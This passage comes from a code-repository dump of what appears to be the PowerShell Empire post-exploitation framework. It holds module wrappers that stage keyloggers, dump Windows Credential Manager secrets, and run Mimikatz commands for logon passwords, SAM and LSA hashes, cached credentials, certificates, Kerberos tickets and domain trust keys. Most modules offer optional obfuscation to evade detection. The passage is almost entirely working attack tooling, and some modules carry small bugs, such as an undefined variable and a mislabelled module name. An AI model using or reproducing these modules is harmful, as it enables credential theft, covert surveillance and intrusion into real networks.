73 |                         scriptEnd += " -" + str(option) + " " + str(values['Value'])
74 |         if obfuscate:
75 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
76 |         script += scriptEnd
77 |         return script
78 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/collection/USBKeylogger.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-USBKeyStrokes',
 9 | 
10 |             'Author': ['@Conjectural_hex', '@CyberPoint_SRT'],
11 | 
12 |             'Description': ('Logs USB keys pressed using Event Tracing for Windows (ETW)'),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : True,
19 | 
20 |             'OpsecSafe' : True,
21 | 
22 |             'MinLanguageVersion' : '2',
23 |             
24 |             'Comments': [
25 |                 'https://github.com/CyberPoint/Ruxcon2016ETW/tree/master/KeyloggerPOC',
26 |                 'https://github.com/CyberPoint/ETWKeyLogger_PSE',
27 |                 'https://ruxcon.org.au/assets/2016/slides/ETW_16_RUXCON_NJR_no_notes.pdf'
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             }
40 |         }
41 | 
42 |         # save off a copy of the mainMenu object to access external functionality
43 |         #   like listeners/agent handlers/etc.
44 |         self.mainMenu = mainMenu
45 | 
46 |         for param in params:
47 |             # parameter format is [Name, Value]
48 |             option, value = param
49 |             if option in self.options:
50 |                 self.options[option]['Value'] = value
51 | 
52 | 
53 |     def generate(self, obfuscate=False, obfuscationCommand=""):
54 | 
55 |         # read in the common module source code
56 |         moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-USBKeystrokes.ps1"
57 |         if obfuscate:
58 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
59 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
60 |         try:
61 |             f = open(moduleSource, 'r')
62 |         except:
63 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
64 |             return ""
65 | 
66 |         moduleCode = f.read()
67 |         f.close()
68 | 
69 |         script = moduleCode
70 | 
71 |         scriptEnd = "Get-USBKeystrokes "
72 | 
73 |         for option,values in self.options.iteritems():
74 |             if option.lower() != "agent":
75 |                 if values['Value'] and values['Value'] != '':
76 |                     if values['Value'].lower() == "true":
77 |                         # if we're just adding a switch
78 |                         scriptEnd += " -" + str(option)
79 |                     else:
80 |                         scriptEnd += " -" + str(option) + " " + str(values['Value'])
81 |         if obfuscate:
82 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
83 |         script += scriptEnd
84 |         return script
85 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/collection/keylogger.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Get-KeyStrokes',
 9 | 
10 |             'Author': ['@obscuresec', '@mattifestation', '@harmj0y'],
11 | 
12 |             'Description': ('Logs keys pressed, time and the active window (when changed) to the keystrokes.txt file. This file is located in the agents downloads directory Empire/downloads/<AgentName>/keystrokes.txt.'),
13 | 
14 |             'Background' : True,
15 | 
16 |             'OutputExtension' : None,
17 |             
18 |             'NeedsAdmin' : False,
19 | 
20 |             'OpsecSafe' : True,
21 | 
22 |             'Language' : 'powershell',
23 | 
24 |             'MinLanguageVersion' : '2',
25 |             
26 |             'Comments': [
27 |                 'https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1'
28 |             ]
29 |         }
30 | 
31 |         # any options needed by the module, settable during runtime
32 |         self.options = {
33 |             # format:
34 |             #   value_name : {description, required, default_value}
35 |             'Agent' : {
36 |                 'Description'   :   'Agent to run module on.',
37 |                 'Required'      :   True,
38 |                 'Value'         :   ''
39 |             }
40 |         }
41 | 
42 |         # save off a copy of the mainMenu object to access external functionality
43 |         #   like listeners/agent handlers/etc.
44 |         self.mainMenu = mainMenu
45 | 
46 |         for param in params:
47 |             # parameter format is [Name, Value]
48 |             option, value = param
49 |             if option in self.options:
50 |                 self.options[option]['Value'] = value
51 | 
52 | 
53 |     def generate(self, obfuscate=False, obfuscationCommand=""):
54 | 
55 |         # read in the common module source code
56 |         moduleSource = self.mainMenu.installPath + "/data/module_source/collection/Get-Keystrokes.ps1"
57 | 
58 |         try:
59 |             f = open(moduleSource, 'r')
60 |         except:
61 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
62 |             return ""
63 | 
64 |         moduleCode = f.read()
65 |         f.close()
66 | 
67 |         script = moduleCode
68 | 
69 |         scriptEnd = "Get-Keystrokes "
70 | 
71 |         for option,values in self.options.iteritems():
72 |             if option.lower() != "agent":
73 |                 if values['Value'] and values['Value'] != '':
74 |                     if values['Value'].lower() == "true":
75 |                         # if we're just adding a switch
76 |                         scriptEnd += " -" + str(option)
77 |                     else:
78 |                         scriptEnd += " -" + str(option) + " " + str(values['Value'])
79 |         if obfuscate:
80 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
81 |         script += scriptEnd
82 |         return script
83 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/enum_cred_store.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 |     def __init__(self, mainMenu, params=[]):
 5 |         self.info = {
 6 |             'Name': 'enum_cred_store',
 7 |             'Author': ['BeetleChunks'],
 8 |             'Description': ('Dumps plaintext credentials from the Windows Credential Manager for the current interactive user.'),
 9 |             'Background' : True,
10 |             'OutputExtension' : None,
11 |             'NeedsAdmin' : False,
12 |             'OpsecSafe' : True,
13 |             'Language' : 'powershell',
14 |             'MinLanguageVersion' : '2',
15 |             'Comments': ['The powershell used is based on JimmyJoeBob Alooba\'s CredMan script.\nhttps://gallery.technet.microsoft.com/scriptcenter/PowerShell-Credentials-d44c3cde']
16 |         }
17 | 
18 |         # any options needed by the module, settable during runtime
19 |         self.options = {
20 |             # format:
21 |             #   value_name : {description, required, default_value}
22 |             'Agent' : {
23 |                 'Description'   :   'Agent to run module on.',
24 |                 'Required'      :   True,
25 |                 'Value'         :   ''
26 |             }
27 |         }
28 | 
29 |         # save off a copy of the mainMenu object to access external functionality
30 |         #   like listeners/agent handlers/etc.
31 |         self.mainMenu = mainMenu
32 | 
33 |         for param in params:
34 |             # parameter format is [Name, Value]
35 |             option, value = param
36 |             if option in self.options:
37 |                 self.options[option]['Value'] = value
38 | 
39 | 
40 |     def generate(self, obfuscate=False, obfuscationCommand=""):
41 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/dumpCredStore.ps1"
42 |         scriptCmd = "Invoke-X"
43 |         if obfuscate:
44 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
45 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
46 |         try:
47 |             f = open(moduleSource, 'r')
48 |         except:
49 |             print helpers.color("[!] Unable to open script at the configured path: " + str(scriptPath))
50 |             return ""
51 | 
52 |         script = f.read()
53 |         f.close()
54 | 
55 |         scriptEnd = "\n%s" %(scriptCmd)
56 |         if obfuscate:
57 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
58 |         script += scriptEnd
59 |         return script
60 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/cache.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Mimikatz LSA Dump',
 9 | 
10 |             'Author': ['@JosephBialek', '@gentilkiwi'],
11 | 
12 |             'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
13 |                             "to extract MSCache(v2) hashes."),
14 | 
15 |             'Background' : True,
16 | 
17 |             'OutputExtension' : None,
18 |             
19 |             'NeedsAdmin' : True,
20 | 
21 |             'OpsecSafe' : True,
22 | 
23 |             'Language' : 'powershell',
24 | 
25 |             'MinLanguageVersion' : '2',
26 |             
27 |             'Comments': [
28 |                 'http://clymb3r.wordpress.com/',
29 |                 'http://blog.gentilkiwi.com',
30 |                 "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#lsa"
31 |             ]
32 |         }
33 | 
34 |         # any options needed by the module, settable during runtime
35 |         self.options = {
36 |             # format:
37 |             #   value_name : {description, required, default_value}
38 |             'Agent' : {
39 |                 'Description'   :   'Agent to run module on.',
40 |                 'Required'      :   True,
41 |                 'Value'         :   ''
42 |             }
43 |         }
44 | 
45 |         # save off a copy of the mainMenu object to access external functionality
46 |         #   like listeners/agent handlers/etc.
47 |         self.mainMenu = mainMenu
48 |         
49 |         for param in params:
50 |             # parameter format is [Name, Value]
51 |             option, value = param
52 |             if option in self.options:
53 |                 self.options[option]['Value'] = value
54 | 
55 | 
56 |     def generate(self, obfuscate=False, obfuscationCommand=""):
57 |         
58 |         # read in the common module source code
59 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
60 |         if obfuscate:
61 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
62 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
63 |         try:
64 |             f = open(moduleSource, 'r')
65 |         except:
66 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
67 |             return ""
68 | 
69 |         moduleCode = f.read()
70 |         f.close()
71 | 
72 |         script = moduleCode
73 | 
74 |         scriptEnd = "Invoke-Mimikatz -Command "
75 | 
76 |         scriptEnd += "'\"token::elevate\" \"lsadump::cache\" \"token::revert\"';"
77 |         
78 |         if obfuscate:
79 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
80 |         script += scriptEnd
81 |         return script
82 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/certs.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Mimikatz DumpCerts',
 9 | 
10 |             'Author': ['@JosephBialek', '@gentilkiwi'],
11 | 
12 |             'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
13 |                             "to extract all certificates to the local directory."),
14 | 
15 |             'Background' : True,
16 | 
17 |             'OutputExtension' : None,
18 |             
19 |             'NeedsAdmin' : True,
20 | 
21 |             'OpsecSafe' : True,
22 | 
23 |             'Language' : 'powershell',
24 | 
25 |             'MinLanguageVersion' : '2',
26 |             
27 |             'Comments': [
28 |                 'http://clymb3r.wordpress.com/',
29 |                 'http://blog.gentilkiwi.com'
30 |             ]
31 |         }
32 | 
33 |         # any options needed by the module, settable during runtime
34 |         self.options = {
35 |             # format:
36 |             #   value_name : {description, required, default_value}
37 |             'Agent' : {
38 |                 'Description'   :   'Agent to run module on.',
39 |                 'Required'      :   True,
40 |                 'Value'         :   ''
41 |             }
42 |         }
43 | 
44 |         # save off a copy of the mainMenu object to access external functionality
45 |         #   like listeners/agent handlers/etc.
46 |         self.mainMenu = mainMenu
47 |         
48 |         for param in params:
49 |             # parameter format is [Name, Value]
50 |             option, value = param
51 |             if option in self.options:
52 |                 self.options[option]['Value'] = value
53 | 
54 | 
55 |     def generate(self, obfuscate=False, obfuscationCommand=""):
56 |         
57 |         # read in the common module source code
58 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
59 |         if obfuscate:
60 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
61 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
62 |         try:
63 |             f = open(moduleSource, 'r')
64 |         except:
65 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
66 |             return ""
67 | 
68 |         moduleCode = f.read()
69 |         f.close()
70 | 
71 |         script = moduleCode
72 |         
73 |         # add in the cert dumping command
74 |         scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"' """
75 |         if obfuscate:
76 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
77 |         script += scriptEnd
78 |         return script
79 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/command.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Mimikatz Command',
 9 | 
10 |             'Author': ['@JosephBialek', '@gentilkiwi'],
11 | 
12 |             'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
13 |                             "with a custom command."),
14 | 
15 |             'Background' : True,
16 | 
17 |             'OutputExtension' : None,
18 |             
19 |             'NeedsAdmin' : True,
20 | 
21 |             'OpsecSafe' : True,
22 | 
23 |             'Language' : 'powershell',
24 | 
25 |             'MinLanguageVersion' : '2',
26 |             
27 |             'Comments': [
28 |                 'http://clymb3r.wordpress.com/',
29 |                 'http://blog.gentilkiwi.com'
30 |             ]
31 |         }
32 | 
33 |         # any options needed by the module, settable during runtime
34 |         self.options = {
35 |             # format:
36 |             #   value_name : {description, required, default_value}
37 |             'Agent' : {
38 |                 'Description'   :   'Agent to run module on.',
39 |                 'Required'      :   True,
40 |                 'Value'         :   ''
41 |             },
42 |             'Command' : {
43 |                 'Description'   :   'Custom Invoke-Mimikatz command to run.',
44 |                 'Required'      :   True,
45 |                 'Value'         :   ''
46 |             }
47 |         }
48 | 
49 |         # save off a copy of the mainMenu object to access external functionality
50 |         #   like listeners/agent handlers/etc.
51 |         self.mainMenu = mainMenu
52 |         
53 |         for param in params:
54 |             # parameter format is [Name, Value]
55 |             option, value = param
56 |             if option in self.options:
57 |                 self.options[option]['Value'] = value
58 | 
59 | 
60 |     def generate(self, obfuscate=False, obfuscationCommand=""):
61 |         
62 |         # read in the common module source code
63 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
64 |         if obfuscate:
65 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
66 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
67 |         try:
68 |             f = open(moduleSource, 'r')
69 |         except:
70 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
71 |             return ""
72 | 
73 |         moduleCode = f.read()
74 |         f.close()
75 | 
76 |         script = moduleCode
77 | 
78 |         # build the custom command with whatever options we want
79 |         scriptEnd = "Invoke-Mimikatz -Command "
80 |         scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'"
81 |         if obfuscate:
82 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
83 |         script += scriptEnd
84 |         return script
85 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/extract_tickets.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Mimikatz extract kerberos tickets.',
 9 | 
10 |             'Author': ['@JosephBialek', '@gentilkiwi'],
11 | 
12 |             'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
13 |                             "to extract kerberos tickets from memory in base64-encoded form."),
14 | 
15 |             'Background' : True,
16 | 
17 |             'OutputExtension' : None,
18 |             
19 |             'NeedsAdmin' : False,
20 | 
21 |             'OpsecSafe' : True,
22 | 
23 |             'Language' : 'powershell',
24 | 
25 |             'MinLanguageVersion' : '2',
26 |             
27 |             'Comments': [
28 |                 'http://clymb3r.wordpress.com/',
29 |                 'http://blog.gentilkiwi.com'
30 |             ]
31 |         }
32 | 
33 |         # any options needed by the module, settable during runtime
34 |         self.options = {
35 |             # format:
36 |             #   value_name : {description, required, default_value}
37 |             'Agent' : {
38 |                 'Description'   :   'Agent to run module on.',
39 |                 'Required'      :   True,
40 |                 'Value'         :   ''
41 |             }
42 |         }
43 | 
44 |         # save off a copy of the mainMenu object to access external functionality
45 |         #   like listeners/agent handlers/etc.
46 |         self.mainMenu = mainMenu
47 |         
48 |         for param in params:
49 |             # parameter format is [Name, Value]
50 |             option, value = param
51 |             if option in self.options:
52 |                 self.options[option]['Value'] = value
53 | 
54 | 
55 |     def generate(self, obfuscate=False, obfuscationCommand=""):
56 |         
57 |         # read in the common module source code
58 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
59 |         if obfuscate:
60 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
61 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
62 |         try:
63 |             f = open(moduleSource, 'r')
64 |         except:
65 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
66 |             return ""
67 | 
68 |         moduleCode = f.read()
69 |         f.close()
70 | 
71 |         script = moduleCode
72 | 
73 |         scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'"
74 |         if obfuscate:
75 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
76 |         script += scriptEnd
77 |         return script
78 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/logonpasswords.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Mimikatz DumpCreds',
 9 | 
10 |             'Author': ['@JosephBialek', '@gentilkiwi'],
11 | 
12 |             'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
13 |                             "to extract plaintext credentials from memory."),
14 | 
15 |             'Background' : True,
16 | 
17 |             'OutputExtension' : None,
18 |             
19 |             'NeedsAdmin' : True,
20 | 
21 |             'OpsecSafe' : True,
22 | 
23 |             'Language' : 'powershell',
24 | 
25 |             'MinLanguageVersion' : '2',
26 |             
27 |             'Comments': [
28 |                 'http://clymb3r.wordpress.com/',
29 |                 'http://blog.gentilkiwi.com'
30 |             ]
31 |         }
32 | 
33 |         # any options needed by the module, settable during runtime
34 |         self.options = {
35 |             # format:
36 |             #   value_name : {description, required, default_value}
37 |             'Agent' : {
38 |                 'Description'   :   'Agent to run module on.',
39 |                 'Required'      :   True,
40 |                 'Value'         :   ''
41 |             }
42 |         }
43 | 
44 |         # save off a copy of the mainMenu object to access external functionality
45 |         #   like listeners/agent handlers/etc.
46 |         self.mainMenu = mainMenu
47 |         
48 |         for param in params:
49 |             # parameter format is [Name, Value]
50 |             option, value = param
51 |             if option in self.options:
52 |                 self.options[option]['Value'] = value
53 | 
54 | 
55 |     def generate(self, obfuscate=False, obfuscationCommand=""):
56 |         
57 |         # read in the common module source code
58 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
59 |         if obfuscate:
60 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
61 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
62 |         try:
63 |             f = open(moduleSource, 'r')
64 |         except:
65 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
66 |             return ""
67 | 
68 |         moduleCode = f.read()
69 |         f.close()
70 | 
71 |         script = moduleCode
72 | 
73 |         # build the dump command with whatever options we want
74 |         scriptEnd = "Invoke-Mimikatz -DumpCreds;"
75 | 
76 |         for option,values in self.options.iteritems():
77 |             if option.lower() != "agent":
78 |                 if values['Value'] and values['Value'] != '':
79 |                     scriptEnd += " -" + str(option) + " " + str(values['Value']) 
80 |         if obfuscate:
81 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
82 |         script += scriptEnd
83 |         return script
84 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/lsadump.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Mimikatz LSA Dump',
 9 | 
10 |             'Author': ['@JosephBialek', '@gentilkiwi'],
11 | 
12 |             'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
13 |                             "to extract a particular user hash from memory. "
14 |                             "Useful on domain controllers."),
15 | 
16 |             'Background' : True,
17 | 
18 |             'OutputExtension' : None,
19 |             
20 |             'NeedsAdmin' : True,
21 | 
22 |             'OpsecSafe' : True,
23 | 
24 |             'Language' : 'powershell',
25 | 
26 |             'MinLanguageVersion' : '2',
27 |             
28 |             'Comments': [
29 |                 'http://clymb3r.wordpress.com/',
30 |                 'http://blog.gentilkiwi.com',
31 |                 "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#lsa"
32 |             ]
33 |         }
34 | 
35 |         # any options needed by the module, settable during runtime
36 |         self.options = {
37 |             # format:
38 |             #   value_name : {description, required, default_value}
39 |             'Agent' : {
40 |                 'Description'   :   'Agent to run module on.',
41 |                 'Required'      :   True,
42 |                 'Value'         :   ''
43 |             },
44 |             'Username' : {
45 |                 'Description'   :   'Username to extract the hash for, blank for all local passwords.',
46 |                 'Required'      :   False,
47 |                 'Value'         :   ''
48 |             }
49 |         }
50 | 
51 |         # save off a copy of the mainMenu object to access external functionality
52 |         #   like listeners/agent handlers/etc.
53 |         self.mainMenu = mainMenu
54 |         
55 |         for param in params:
56 |             # parameter format is [Name, Value]
57 |             option, value = param
58 |             if option in self.options:
59 |                 self.options[option]['Value'] = value
60 | 
61 | 
62 |     def generate(self, obfuscate=False, obfuscationCommand=""):
63 |         
64 |         # read in the common module source code
65 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
66 |         if obfuscate:
67 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
68 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
69 |         try:
70 |             f = open(moduleSource, 'r')
71 |         except:
72 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
73 |             return ""
74 | 
75 |         moduleCode = f.read()
76 |         f.close()
77 | 
78 |         script = moduleCode
79 | 
80 |         scriptEnd = "Invoke-Mimikatz -Command "
81 | 
82 |         if self.options['Username']['Value'] != '':
83 |             scriptEnd += "'\"lsadump::lsa /inject /name:" + self.options['Username']['Value']
84 |         else:
85 |             scriptEnd += "'\"lsadump::lsa /patch"
86 | 
87 |         scriptEnd += "\"';"
88 |         if obfuscate:
89 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
90 |         script += scriptEnd
91 |         return script
92 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/purge.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Mimikatz Golden Ticket',
 9 | 
10 |             'Author': ['@JosephBialek', '@gentilkiwi'],
11 | 
12 |             'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
13 |                             "to purge all current kerberos tickets from memory."),
14 | 
15 |             'Background' : True,
16 | 
17 |             'OutputExtension' : None,
18 |             
19 |             'NeedsAdmin' : False,
20 | 
21 |             'OpsecSafe' : True,
22 | 
23 |             'Language' : 'powershell',
24 | 
25 |             'MinLanguageVersion' : '2',
26 |             
27 |             'Comments': [
28 |                 'http://clymb3r.wordpress.com/',
29 |                 'http://blog.gentilkiwi.com',
30 |                 "https://github.com/gentilkiwi/mimikatz/wiki/module-~-kerberos"
31 |             ]
32 |         }
33 | 
34 |         # any options needed by the module, settable during runtime
35 |         self.options = {
36 |             # format:
37 |             #   value_name : {description, required, default_value}
38 |             'Agent' : {
39 |                 'Description'   :   'Agent to run module on.',
40 |                 'Required'      :   True,
41 |                 'Value'         :   ''
42 |             }
43 |         }
44 | 
45 |         # save off a copy of the mainMenu object to access external functionality
46 |         #   like listeners/agent handlers/etc.
47 |         self.mainMenu = mainMenu
48 | 
49 |         for param in params:
50 |             # parameter format is [Name, Value]
51 |             option, value = param
52 |             if option in self.options:
53 |                 self.options[option]['Value'] = value
54 | 
55 | 
56 |     def generate(self, obfuscate=False, obfuscationCommand=""):
57 |         
58 |         # read in the common module source code
59 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
60 |         if obfuscate:
61 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
62 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
63 |         try:
64 |             f = open(moduleSource, 'r')
65 |         except:
66 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
67 |             return ""
68 | 
69 |         moduleCode = f.read()
70 |         f.close()
71 | 
72 |         script = moduleCode
73 | 
74 |         # set the purge command
75 |         scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::purge\"'"
76 |         if obfuscate:
77 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
78 |         script += scriptEnd
79 |         return script
80 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/sam.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Mimikatz SAM dump',
 9 | 
10 |             'Author': ['@JosephBialek', '@gentilkiwi'],
11 | 
12 |             'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
13 |                             "to extract hashes from the Security Account Managers "
14 |                             "(SAM) database."),
15 | 
16 |             'Background' : True,
17 | 
18 |             'OutputExtension' : None,
19 |             
20 |             'NeedsAdmin' : True,
21 | 
22 |             'OpsecSafe' : True,
23 | 
24 |             'Language' : 'powershell',
25 | 
26 |             'MinLanguageVersion' : '2',
27 |             
28 |             'Comments': [
29 |                 'http://clymb3r.wordpress.com/',
30 |                 'http://blog.gentilkiwi.com',
31 |                 "https://github.com/gentilkiwi/mimikatz/wiki/module-~-lsadump#lsa"
32 |             ]
33 |         }
34 | 
35 |         # any options needed by the module, settable during runtime
36 |         self.options = {
37 |             # format:
38 |             #   value_name : {description, required, default_value}
39 |             'Agent' : {
40 |                 'Description'   :   'Agent to run module on.',
41 |                 'Required'      :   True,
42 |                 'Value'         :   ''
43 |             }
44 |         }
45 | 
46 |         # save off a copy of the mainMenu object to access external functionality
47 |         #   like listeners/agent handlers/etc.
48 |         self.mainMenu = mainMenu
49 |         
50 |         for param in params:
51 |             # parameter format is [Name, Value]
52 |             option, value = param
53 |             if option in self.options:
54 |                 self.options[option]['Value'] = value
55 | 
56 | 
57 |     def generate(self, obfuscate=False, obfuscationCommand=""):
58 |         
59 |         # read in the common module source code
60 |         moduleSource = self.mainMenu.installPath + "/data/module_source/credentials/Invoke-Mimikatz.ps1"
61 |         if obfuscate:
62 |             helpers.obfuscate_module(moduleSource=moduleSource, obfuscationCommand=obfuscationCommand)
63 |             moduleSource = moduleSource.replace("module_source", "obfuscated_module_source")
64 |         try:
65 |             f = open(moduleSource, 'r')
66 |         except:
67 |             print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
68 |             return ""
69 | 
70 |         moduleCode = f.read()
71 |         f.close()
72 | 
73 |         script = moduleCode
74 | 
75 |         scriptEnd = "Invoke-Mimikatz -Command "
76 | 
77 |         scriptEnd += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';"
78 |         if obfuscate:
79 |             scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand)
80 |         script += scriptEnd
81 |         return script
82 | 


--------------------------------------------------------------------------------
/lib/modules/powershell/credentials/mimikatz/trust_keys.py:
--------------------------------------------------------------------------------
 1 | from lib.common import helpers
 2 | 
 3 | class Module:
 4 | 
 5 |     def __init__(self, mainMenu, params=[]):
 6 | 
 7 |         self.info = {
 8 |             'Name': 'Invoke-Mimikatz TrustKeys',
 9 | 
10 |             'Author': ['@JosephBialek', '@gentilkiwi'],
11 | 
12 |             'Description': ("Runs PowerSploit's Invoke-Mimikatz function "
13 |                             "to extract domain trust keys from a domain controller."),
14 | 
15 |             'Background' : True,
16 | 
17 |             'OutputExtension' : None,
18 |             
19 |             'NeedsAdmin' : True,
20 | 
21 |             'OpsecSafe' : True,
22 | 
23 |             'Language' : 'powershell',
24 | 
25 |             'MinLanguageVersion' : '2',
26 |             
27 |             'Comments': [
28 |                 'http://clymb3r.wordpress.com/',
29 |                 'http://blog.gentilkiwi.com'
30 |             ]
31 |         }
32 | 
33 |         # any options needed by the module, settable during runtime
34 |         self.options = {
35 |             # format:
36 |             #   value_name : {description, required, default_value}
